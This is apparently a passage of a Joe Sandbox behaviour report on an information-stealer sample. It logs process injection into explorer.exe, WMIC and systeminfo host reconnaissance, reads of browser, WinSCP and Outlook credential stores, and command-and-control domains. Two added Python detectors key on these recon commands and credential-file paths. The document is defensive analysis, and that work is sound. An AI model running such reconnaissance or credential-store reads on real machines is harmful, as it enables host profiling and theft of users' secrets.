    Source: C:\Windows\explorer.exeMemory written: PID: 3488 base: 7FF6091E2D10 value: 90Jump to behavior
    Source: C:\Users\user\Desktop\O4zPA1oI9Y.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
    Source: C:\Users\user\Desktop\O4zPA1oI9Y.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
    Source: C:\Users\user\AppData\Roaming\jvgasiiSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
    Source: C:\Users\user\AppData\Roaming\jvgasiiSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\DE97.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\DE97.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
    Source: C:\Users\user\AppData\Roaming\uegasiiSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
    Source: C:\Users\user\AppData\Roaming\uegasiiSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
    Source: C:\Windows\explorer.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 6B79C0Jump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeCode function: RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,GetCurrentProcessId,wsprintfA,RtlMoveMemory,CreateToolhelp32Snapshot,Process32First,CharLowerA,lstrcmpiA,lstrcmpiA,Process32Next,CloseHandle,Sleep, explorer.exe18_2_00471016
    Source: C:\Windows\SysWOW64\explorer.exeCode function: wsprintfA,RtlMoveMemory,CreateToolhelp32Snapshot,Process32First,CharLowerA,lstrcmpiA,lstrcmpiA,Process32Next,CloseHandle,Sleep, explorer.exe18_2_004710A5
    Source: C:\Users\user\AppData\Local\Temp\8CAE.exe | Process created: C:\Windows\System32\cmd.exe cmd
    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /format:csv
    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /format:csv
    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path AntiSpywareProduct Get displayName /format:csv
    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Processor Get Name,DeviceID,NumberOfCores /format:csv
    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Product Get Name,Version /format:csv
    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_NetworkAdapter Where PhysicalAdapter=TRUE Get Name,MACAddress,ProductName,ServiceName,NetConnectionID /format:csv
    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_StartupCommand Get Name,Location,Command /format:csv
    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_OperatingSystem Get Caption,CSDVersion,BuildNumber,Version,BuildType,CountryCode,CurrentTimeZone,InstallDate,LastBootUpTime,Locale,OSArchitecture,OSLanguage,OSProductSuite,OSType,SystemDirectory,Organization,RegisteredUser,SerialNumber /format:csv
    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Process Get Caption,CommandLine,ExecutablePath,ProcessId /format:csv
    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Volume Get Name,Label,FileSystem,SerialNumber,BootVolume,Capacity,DriveType /format:csv
    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_UserAccount Get Name,Domain,AccountType,LocalAccount,Disabled,Status,SID /format:csv
    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_GroupUser Get GroupComponent,PartComponent /format:csv
    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_ComputerSystem Get Caption,Manufacturer,PrimaryOwnerName,UserName,Workgroup /format:csv
    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_PnPEntity Where ClassGuid="{50dd5230-ba8a-11d1-bf5d-0000f805f530}" Get Name,DeviceID,PNPDeviceID,Manufacturer,Description /format:csv
    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\ipconfig.exe ipconfig /displaydns
    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\ROUTE.EXE route print
    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\netsh.exe netsh firewall show state
    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\systeminfo.exe systeminfo
    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tasklist.exe tasklist /v /fo csv
    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 path win32_operatingsystem get caption,csdversion,buildnumber,version,buildtype,countrycode,currenttimezone,installdate,lastbootuptime,locale,osarchitecture,oslanguage,osproductsuite,ostype,systemdirectory,organization,registereduser,serialnumber /format:csv (observed twice)
    Source: explorer.exe, 00000002.00000000.2216801762.00000000013A0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: IProgram Manager
    Source: explorer.exe, 00000002.00000000.2216801762.00000000013A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2217863499.00000000048E0000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
    Source: explorer.exe, 00000002.00000000.2216801762.00000000013A0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
    Source: explorer.exe, 00000002.00000000.2216587269.0000000000D69000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: +Progman
    Source: explorer.exe, 00000002.00000000.2216801762.00000000013A0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
    Source: explorer.exe, 00000002.00000000.2219776484.00000000098AD000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Shell_TrayWnd31A
    Source: C:\Windows\SysWOW64\explorer.exe | Code function: 13_2_004855EB cpuid | 13_2_004855EB
    Source: C:\Users\user\AppData\Local\Temp\8CAE.exe | Queries volume information: C:\ VolumeInformation
    Source: C:\Windows\System32\netsh.exe | Queries volume information: C:\ VolumeInformation
    Source: C:\Users\user\Desktop\O4zPA1oI9Y.exe | Code function: 0_2_00418DF0 InterlockedCompareExchange,GetFocus,ReadConsoleA,FindAtomA,SearchPathA,SetConsoleMode,SearchPathW,GetDefaultCommConfigA,CopyFileExW,CreatePipe,GetEnvironmentStringsW,WriteConsoleOutputA,GetModuleFileNameA,GetSystemTimeAdjustment,ObjectPrivilegeAuditAlarmW,WaitForSingleObject,SetCommState,GetConsoleAliasesLengthW,GetComputerNameA,CopyFileW,GetFileAttributesA,GetConsoleAliasExesLengthW,GetBinaryType,FormatMessageA,GetLongPathNameA,PurgeComm,LoadLibraryA,MoveFileW,InterlockedCompareExchange | 0_2_00418DF0
    Source: C:\Windows\SysWOW64\explorer.exe | Code function: 13_2_00432198 RtlZeroMemory,GetVersionExW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,RtlCompareMemory,RtlCompareMemory,StrStrIW,FreeLibrary | 13_2_00432198
    Source: C:\Users\user\AppData\Local\Temp\8CAE.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
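    The command list above (one cmd.exe spawned by the dropped 8CAE.exe, then a burst of WMIC, ipconfig, route, netsh, systeminfo and tasklist children within seconds) is what a process-creation detection should key on rather than any single command, since an administrator runs tasklist or ipconfig all the time. The following is an added example and not part of the Joe Sandbox report or of the sample: a small Python detector over constructed process-creation events in a pipe-delimited format made up here to mirror the report's rows. The parent PIDs 5124 and 7001, the timestamps, the rule names and the thresholds are this example's assumptions. It groups children by parent, counts how many distinct reconnaissance categories appear from one parent inside a time window, and rates the alert high when the root\SecurityCenter2 AntiVirusProduct / FirewallProduct / AntiSpywareProduct queries are among them, because a user-mode stealer asking Windows which security products are installed is the clearest sign of host profiling in the list.

```python
"""Flag a host/security-software reconnaissance burst launched from one shell.

Added example, not the sandbox's code. The events below are constructed to
mirror the cmd.exe -> WMIC.exe / systeminfo / tasklist / netsh / ipconfig /
route chain in the report; PIDs and timestamps are made up.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Rule name -> regex applied to the lower-cased command line.
RECON_RULES = {
    "securitycenter2_av_enum": r"\bwmic\b.*securitycenter2.*\b(antivirus|firewall|antispyware)product\b",
    "wmi_os_inventory": r"\bwmic\b.*\bwin32_(operatingsystem|computersystem|processor|product|volume)\b",
    "wmi_account_enum": r"\bwmic\b.*\bwin32_(useraccount|groupuser)\b",
    "wmi_process_enum": r"\bwmic\b.*\bwin32_process\b",
    "wmi_startup_enum": r"\bwmic\b.*\bwin32_startupcommand\b",
    "wmi_hardware_enum": r"\bwmic\b.*\bwin32_(networkadapter|pnpentity)\b",
    "systeminfo": r"^systeminfo\b",
    "tasklist": r"^tasklist\b",
    "netsh_firewall_state": r"^netsh\b.*\bfirewall\b.*\bshow\b",
    "dns_cache_dump": r"^ipconfig\b.*/displaydns\b",
    "route_print": r"^route\b.*\bprint\b",
}
_COMPILED = {name: re.compile(rx) for name, rx in RECON_RULES.items()}


def parse_events(text):
    """Parse 'timestamp|parent_pid|parent_image|image|command_line' lines
    (a constructed format for this example, not Sysmon's)."""
    events = []
    for line in text.strip().splitlines():
        ts, ppid, parent, image, cmdline = line.split("|", 4)
        events.append({"ts": datetime.fromisoformat(ts), "ppid": int(ppid),
                       "parent": parent, "image": image, "cmdline": cmdline})
    return events


def detect_recon_bursts(events, min_rules=4, window=timedelta(minutes=5)):
    """Return one finding per parent whose children matched at least min_rules
    distinct rules within `window` of that parent's first child. One tasklist
    or ipconfig is admin noise; a dozen different inventory commands in a
    minute from a single shell is the stealer's fingerprint."""
    by_parent = defaultdict(list)
    for ev in sorted(events, key=lambda e: e["ts"]):
        by_parent[ev["ppid"]].append(ev)

    findings = []
    for ppid, children in by_parent.items():
        start = children[0]["ts"]
        matched = set()
        for ev in children:
            if ev["ts"] - start > window:
                break
            low = ev["cmdline"].lower()
            matched.update(n for n, rx in _COMPILED.items() if rx.search(low))
        if len(matched) >= min_rules:
            findings.append({
                "parent_pid": ppid,
                "parent_image": children[0]["parent"],
                "rules": sorted(matched),
                # Asking SecurityCenter2 which AV/firewall is installed is the
                # clearest sign that malware is profiling its host.
                "severity": "high" if "securitycenter2_av_enum" in matched else "medium",
            })
    return findings


# Constructed sample: PID 5124 stands for the cmd.exe spawned by the dropped
# 8CAE.exe; PID 7001 is an administrator's shell running two ordinary commands.
SAMPLE_LOG = r"""
2024-10-08T11:02:15|5124|C:\Windows\System32\cmd.exe|C:\Windows\System32\wbem\WMIC.exe|wmic /namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /format:csv
2024-10-08T11:02:16|5124|C:\Windows\System32\cmd.exe|C:\Windows\System32\wbem\WMIC.exe|wmic /namespace:\\root\cimv2 Path Win32_Processor Get Name,DeviceID,NumberOfCores /format:csv
2024-10-08T11:02:17|5124|C:\Windows\System32\cmd.exe|C:\Windows\System32\wbem\WMIC.exe|wmic /namespace:\\root\cimv2 Path Win32_NetworkAdapter Where PhysicalAdapter=TRUE Get Name,MACAddress /format:csv
2024-10-08T11:02:18|5124|C:\Windows\System32\cmd.exe|C:\Windows\System32\wbem\WMIC.exe|wmic /namespace:\\root\cimv2 Path Win32_StartupCommand Get Name,Location,Command /format:csv
2024-10-08T11:02:19|5124|C:\Windows\System32\cmd.exe|C:\Windows\System32\wbem\WMIC.exe|wmic /namespace:\\root\cimv2 Path Win32_OperatingSystem Get Caption,Version /format:csv
2024-10-08T11:02:20|5124|C:\Windows\System32\cmd.exe|C:\Windows\System32\wbem\WMIC.exe|wmic /namespace:\\root\cimv2 Path Win32_Process Get Caption,CommandLine,ExecutablePath,ProcessId /format:csv
2024-10-08T11:02:21|5124|C:\Windows\System32\cmd.exe|C:\Windows\System32\wbem\WMIC.exe|wmic /namespace:\\root\cimv2 Path Win32_UserAccount Get Name,Domain,SID /format:csv
2024-10-08T11:02:22|5124|C:\Windows\System32\cmd.exe|C:\Windows\System32\wbem\WMIC.exe|wmic /namespace:\\root\cimv2 Path Win32_PnPEntity Where ClassGuid="{50dd5230-ba8a-11d1-bf5d-0000f805f530}" Get Name,DeviceID /format:csv
2024-10-08T11:02:23|5124|C:\Windows\System32\cmd.exe|C:\Windows\System32\ipconfig.exe|ipconfig /displaydns
2024-10-08T11:02:24|5124|C:\Windows\System32\cmd.exe|C:\Windows\System32\ROUTE.EXE|route print
2024-10-08T11:02:25|5124|C:\Windows\System32\cmd.exe|C:\Windows\System32\netsh.exe|netsh firewall show state
2024-10-08T11:02:26|5124|C:\Windows\System32\cmd.exe|C:\Windows\System32\systeminfo.exe|systeminfo
2024-10-08T11:02:27|5124|C:\Windows\System32\cmd.exe|C:\Windows\System32\tasklist.exe|tasklist /v /fo csv
2024-10-08T11:40:02|7001|C:\Windows\System32\cmd.exe|C:\Windows\System32\ipconfig.exe|ipconfig /all
2024-10-08T11:40:09|7001|C:\Windows\System32\cmd.exe|C:\Windows\System32\tasklist.exe|tasklist /svc
"""

if __name__ == "__main__":
    for f in detect_recon_bursts(parse_events(SAMPLE_LOG)):
        print(f"[{f['severity']}] parent pid {f['parent_pid']} ({f['parent_image']}) "
              f"matched {len(f['rules'])} recon rules: {', '.join(f['rules'])}")
```

    Running the block prints one high-severity finding for PID 5124 (all eleven rules hit) and nothing for the administrator's shell, which only trips the tasklist rule. The window is measured from the parent's first child rather than as a sliding window, which is enough for a burst like this one; a production rule would also want the parent's own lineage (here cmd.exe started by a freshly dropped executable in %TEMP%), since that context is what separates this chain from an inventory script run by a management agent.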

    Lowering of HIPS / PFW / Operating System Security Settings

    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\netsh.exe netsh firewall show state (observed twice)
    Source: 8CAE.exe, 0000000B.00000002.4581484598.000002404C82F000.00000004.00000020.00020000.00000000.sdmp, 8CAE.exe, 0000000B.00000003.3320217363.000002404C821000.00000004.00000020.00020000.00000000.sdmp, 8CAE.exe, 0000000B.00000003.3608910375.000002404C832000.00000004.00000020.00020000.00000000.sdmp, 8CAE.exe, 0000000B.00000003.3320585267.000002404C82E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
    Source: C:\Users\user\AppData\Local\Temp\8CAE.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
    Source: C:\Users\user\AppData\Local\Temp\8CAE.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
    Source: C:\Users\user\AppData\Local\Temp\8CAE.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiSpywareProduct
    Source: C:\Windows\System32\wbem\WMIC.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiVirusProduct
    Source: C:\Windows\System32\wbem\WMIC.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM FirewallProduct
    Source: C:\Windows\System32\wbem\WMIC.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiSpywareProduct

    Stealing of Sensitive Information

    Source: Yara match | File source: 00000011.00000002.4578892665.00000000005C1000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
    Source: Yara match | File source: 00000010.00000002.4579455330.0000000002F01000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
    Source: Yara match | File source: Process Memory Space: explorer.exe PID: 6316, type: MEMORYSTR
    Source: Yara match | File source: Process Memory Space: explorer.exe PID: 2736, type: MEMORYSTR
    Source: Yara match | File source: 00000006.00000002.2516872418.00000000006F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
    Source: Yara match | File source: 0000000A.00000002.3040798589.00000000006B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: Yara match | File source: 00000009.00000002.2777517126.00000000006B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: Yara match | File source: 00000000.00000002.2233667706.0000000002170000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: Yara match | File source: 00000000.00000002.2233749509.0000000002191000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
    Source: Yara match | File source: 00000006.00000002.2516839505.00000000006D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: Yara match | File source: 00000009.00000002.2777687762.00000000008D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
    Source: Yara match | File source: 0000000A.00000002.3041046973.00000000006D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
    Source: C:\Windows\SysWOW64\explorer.exe | Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl
    Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
    Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-shm
    Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
    Source: C:\Windows\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
    Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
    Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-wal
    Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite
    Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
    Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
    Source: C:\Windows\SysWOW64\explorer.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
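    Two things stand out in the rows above: the process reading Chrome, Edge and Firefox credential and cookie stores, the WinSCP registry hive (HKCU\Software\Martin Prikryl) and the Outlook profile key is explorer.exe, which has no reason to open any of them, and most of those opens come from C:\Windows\SysWOW64\explorer.exe, the 32-bit copy, not the shell that normally runs from C:\Windows\explorer.exe. The following is an added example and not part of the Joe Sandbox report or of the sample: a Python triage routine over constructed file/registry-open events made up here to mirror the rows above (plus two benign controls). The category names, the expected-owner table, the chrome.exe path and the notes.txt event are this example's assumptions. It classifies each target path, drops opens made by the program that owns the store, and rates any explorer.exe hit at least medium, raising it to high when that explorer.exe is not the real shell binary.

```python
"""Triage file and registry opens by explorer.exe against credential stores.

Added example, not the sandbox's signature logic. The events are constructed
to mirror the 'File opened' / 'Key opened' rows in the report; the categories,
the expected-owner table and the image paths other than explorer.exe are this
example's assumptions.
"""
import re
from collections import defaultdict

# Lower-cased path pattern -> category. Browser stores are SQLite databases;
# cookies.sqlite-wal / -shm are SQLite's write-ahead-log and shared-memory
# side files, opened by whoever reads the database.
CREDENTIAL_STORE_PATTERNS = [
    (r"\\(google\\chrome|microsoft\\edge)\\user data\\.*\\login data$", "browser_passwords"),
    (r"\\(google\\chrome|microsoft\\edge)\\user data\\.*\\network\\cookies$", "browser_cookies"),
    (r"\\(google\\chrome|microsoft\\edge)\\user data\\.*\\web data$", "browser_autofill"),
    (r"\\mozilla\\firefox\\profiles\\.*\\cookies\.sqlite(-wal|-shm)?$", "browser_cookies"),
    (r"\\mozilla\\firefox\\profiles\.ini$", "browser_profile_enum"),
    (r"^hkey_current_user\\software\\martin prikryl", "winscp_sessions"),
    (r"\\windows messaging subsystem\\profiles\\", "mail_profiles"),
]
_COMPILED = [(re.compile(rx), cat) for rx, cat in CREDENTIAL_STORE_PATTERNS]

# Processes that legitimately open each store (assumed list for the example).
EXPECTED_OWNERS = {
    "browser_passwords": {"chrome.exe", "msedge.exe", "firefox.exe"},
    "browser_cookies": {"chrome.exe", "msedge.exe", "firefox.exe"},
    "browser_autofill": {"chrome.exe", "msedge.exe"},
    "browser_profile_enum": {"firefox.exe"},
    "winscp_sessions": {"winscp.exe"},
    "mail_profiles": {"outlook.exe"},
}
# The Windows shell runs from here; C:\Windows\SysWOW64\explorer.exe is the
# 32-bit copy, which nothing starts in normal use.
EXPECTED_SHELL = r"c:\windows\explorer.exe"


def classify(target):
    """Map a file path or registry key to a credential-store category, or None."""
    low = target.lower()
    for rx, category in _COMPILED:
        if rx.search(low):
            return category
    return None


def triage(events):
    """Return {image: finding} for every process that touched a store it does
    not own. explorer.exe has no reason to read any of these, so it is at
    least medium; an explorer.exe that is not the real shell binary is high."""
    touched = defaultdict(set)
    for ev in events:
        category = classify(ev["target"])
        if category is None:
            continue
        exe = ev["image"].lower().rsplit("\\", 1)[-1]
        if exe in EXPECTED_OWNERS[category]:
            continue  # the browser/mail/SFTP client reading its own data
        touched[ev["image"]].add(category)

    findings = {}
    for image, categories in touched.items():
        low = image.lower()
        is_explorer = low.endswith("\\explorer.exe")
        unexpected_path = is_explorer and low != EXPECTED_SHELL
        if unexpected_path:
            severity = "high"
        elif is_explorer:
            severity = "medium"
        else:
            severity = "low"
        findings[image] = {"categories": sorted(categories), "severity": severity,
                           "unexpected_image_path": unexpected_path}
    return findings


# Constructed events mirroring the report's rows, plus two benign controls.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\SysWOW64\explorer.exe", "target": r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    {"image": r"C:\Windows\SysWOW64\explorer.exe", "target": r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies"},
    {"image": r"C:\Windows\SysWOW64\explorer.exe", "target": r"C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-wal"},
    {"image": r"C:\Windows\SysWOW64\explorer.exe", "target": r"C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data"},
    {"image": r"C:\Windows\SysWOW64\explorer.exe", "target": r"HKEY_CURRENT_USER\Software\Martin Prikryl"},
    {"image": r"C:\Windows\SysWOW64\explorer.exe", "target": r"HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676"},
    {"image": r"C:\Windows\explorer.exe", "target": r"C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini"},
    {"image": r"C:\Program Files\Google\Chrome\Application\chrome.exe", "target": r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    {"image": r"C:\Windows\explorer.exe", "target": r"C:\Users\user\Desktop\notes.txt"},
]

if __name__ == "__main__":
    for image, f in triage(SAMPLE_EVENTS).items():
        print(f"[{f['severity']}] {image}: {', '.join(f['categories'])}")
```

    On the sample the SysWOW64 explorer.exe comes out high with browser cookies, browser passwords, mail profiles and WinSCP sessions; the real shell comes out medium for reading profiles.ini (the Firefox profile enumeration step); chrome.exe reading its own Login Data is dropped. Matching on the image path alone is a heuristic: a payload injected into the genuine C:\Windows\explorer.exe would only reach medium here, which is why the file-access signal should be joined with the cross-process memory writes and section mappings reported earlier in the page.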

    Remote Access Functionality

    Source: Yara match | File source: 00000011.00000002.4578892665.00000000005C1000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
    Source: Yara match | File source: 00000010.00000002.4579455330.0000000002F01000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
    Source: Yara match | File source: Process Memory Space: explorer.exe PID: 6316, type: MEMORYSTR
    Source: Yara match | File source: Process Memory Space: explorer.exe PID: 2736, type: MEMORYSTR
    Source: Yara match | File source: 00000006.00000002.2516872418.00000000006F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
    Source: Yara match | File source: 0000000A.00000002.3040798589.00000000006B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: Yara match | File source: 00000009.00000002.2777517126.00000000006B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: Yara match | File source: 00000000.00000002.2233667706.0000000002170000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: Yara match | File source: 00000000.00000002.2233749509.0000000002191000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
    Source: Yara match | File source: 00000006.00000002.2516839505.00000000006D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: Yara match | File source: 00000009.00000002.2777687762.00000000008D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
    Source: Yara match | File source: 0000000A.00000002.3041046973.00000000006D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
    ATT&CK matrix, one line per tactic. A number in parentheses is the signature-count badge shown in that cell of the matrix as extracted; techniques without a number are matrix cells with no matching signature.
    Reconnaissance: Gather Victim Identity Information, Credentials, Email Addresses, Employee Names, Gather Victim Network Information, Domain Properties, DNS, Network Trust Dependencies, Network Topology, IP Addresses
    Resource Development: Acquire Infrastructure, Domains, DNS Server, Virtual Private Server, Server, Botnet, Web Services, Serverless, Malvertising, Compromise Infrastructure
    Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media, External Remote Services, Drive-by Compromise, Exploit Public-Facing Application, Supply Chain Compromise
    Execution: Windows Management Instrumentation (241), Native API (11), Exploitation for Client Execution (1), Command and Scripting Interpreter (1), Launchd, Scheduled Task, Systemd Timers, Container Orchestration Job, Command and Scripting Interpreter, PowerShell
    Persistence: DLL Side-Loading (1), Boot or Logon Initialization Scripts, Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts, Startup Items, Scheduled Task/Job, At, Cron
    Privilege Escalation: DLL Side-Loading (1), Process Injection (522), Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts, Startup Items, Scheduled Task/Job, At, Cron
    Defense Evasion: Disable or Modify Tools (2), Deobfuscate/Decode Files or Information (1), Obfuscated Files or Information (3), Software Packing (12), DLL Side-Loading (1), File Deletion (1), Masquerading (11), Virtualization/Sandbox Evasion (34), Process Injection (522), Hidden Files and Directories (1)
    Credential Access: OS Credential Dumping (1), Input Capture (11), Credentials in Registry (1), NTDS, LSA Secrets, Cached Domain Credentials, DCSync, Proc Filesystem, /etc/passwd and /etc/shadow, Network Sniffing
    Discovery: System Time Discovery (11), File and Directory Discovery (3), System Information Discovery (249), Query Registry (1), Security Software Discovery (881), Virtualization/Sandbox Evasion (34), Process Discovery (4), Application Window Discovery (1), System Network Configuration Discovery (1), Network Service Discovery
    Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC, Windows Remote Management, Cloud Services, Direct Cloud VM Connections, Shared Webroot
    Collection: Archive Collected Data (11), Data from Local System (1), Email Collection (1), Input Capture (11), Keylogging, GUI Input Capture, Web Portal Capture, Credential API Hooking, Data Staged, Local Data Staging
    Command and Control: Ingress Tool Transfer (3), Encrypted Channel (21), Non-Application Layer Protocol (4), Application Layer Protocol (115), Fallback Channels, Multiband Communication, Commonly Used Port, Application Layer Protocol, Web Protocols, File Transfer Protocols
    Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Traffic Duplication, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel, Exfiltration Over Alternative Protocol, Exfiltration Over Symmetric Encrypted Non-C2 Protocol, Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
    Impact: Data Encrypted for Impact (1), Network Denial of Service, Data Encrypted for Impact, Data Destruction, Data Encrypted for Impact, Service Stop, Inhibit System Recovery, Defacement, Internal Defacement, External Defacement

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
    Behavior Graph ID: 1529186 | Sample: O4zPA1oI9Y.exe | Start date: 08/10/2024 | Architecture: WINDOWS | Score: 100
    Top level (node 2). DNS/IP: nwgrus.ru; ninjahallnews.com; 2 other IPs or domains. Signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 6 other signatures. Started: O4zPA1oI9Y.exe (node 10), jvgasii (node 13), uegasii (node 15), msiexec.exe (node 17).
